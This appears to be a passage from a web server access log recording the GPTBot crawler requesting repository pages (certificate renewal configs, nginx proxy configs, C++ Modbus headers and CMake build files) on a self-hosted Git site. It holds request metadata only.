"/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf?display=source" [Client 74.7.227.38] [Length 11723] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:15:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.2" -[17/Feb/2026:15:55:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log?display=rendered" [Client 74.7.227.38] [Length 10973] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/fallback_error.log" -[17/Feb/2026:15:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5?display=rendered" [Client 74.7.227.38] [Length 10997] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.5" -[17/Feb/2026:15:55:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.3" -[17/Feb/2026:15:55:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.4" -[17/Feb/2026:15:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1?display=rendered" [Client 74.7.227.38] [Length 10999] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.1" -[17/Feb/2026:15:55:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7?display=rendered" [Client 74.7.227.38] [Length 10959] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.7" -[17/Feb/2026:15:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf?display=source" [Client 74.7.227.38] [Length 11724] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:15:55:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf?display=source" [Client 74.7.227.38] [Length 11697] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:15:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf?display=source" [Client 74.7.227.38] [Length 11726] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:15:55:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/letsencrypt/renewal/npm-2.conf" -[17/Feb/2026:15:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6?display=rendered" [Client 74.7.227.38] [Length 11001] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/letsencrypt.log.6" -[17/Feb/2026:15:55:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/2.conf" -[17/Feb/2026:15:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/1.conf" -[17/Feb/2026:15:55:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" [Client 74.7.227.38] [Length 9949] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/4.conf" -[17/Feb/2026:15:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" [Client 74.7.227.38] [Length 10170] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/nginx/proxy_host/3.conf" -[17/Feb/2026:15:55:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 11601] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10459] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:55:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12051] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10607] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11400] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 366] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" [Client 74.7.227.38] [Length 13339] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 11399] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" [Client 74.7.227.38] [Length 10604] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:15:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 12050] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:15:55:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9994] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/log_macros.hpp" -[17/Feb/2026:15:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11048] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15178] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" [Client 74.7.227.38] [Length 94] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/include/app_init.hpp" -[17/Feb/2026:15:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11051] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9959] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:15:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 15180] [Gzip 5.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 11052] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10" -[17/Feb/2026:15:55:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 21647] [Gzip 28.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 12560] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10249] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:55:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 16837] [Gzip 7.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" [Client 74.7.227.38] [Length 9983] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeDetermineCompilerABI_CXX.bin" -[17/Feb/2026:15:55:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 6268] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" -[17/Feb/2026:15:55:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 9968] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" -[17/Feb/2026:15:55:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeCXXCompiler.cmake" [Client 74.7.227.38] [Length 10240] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 